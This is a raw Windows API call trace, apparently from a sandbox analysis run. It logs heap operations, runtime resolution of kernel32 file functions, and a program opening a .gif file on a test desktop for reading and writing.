HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0163.776] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0163.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0163.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd9a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.776] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0163.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0163.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0163.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd9a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0163.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.777] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0163.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0163.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0163.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0163.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0163.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0163.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0163.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923ad0 [0163.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", cchWideChar=78, lpMultiByteStr=0x923ad0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", lpUsedDefaultChar=0x0) returned 78 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0163.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0163.778] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\e5mhiatvfij2bqac0v.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0163.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0163.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0163.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0163.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0163.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0163.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9c) returned 0x8f9058 [0163.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=78, lpWideCharStr=0x8f9058, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif") returned 78 [0163.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0163.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0163.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0163.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0163.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.377] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.378] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0164.379] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0164.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0164.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.380] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.381] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0164.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0164.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.381] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0164.381] 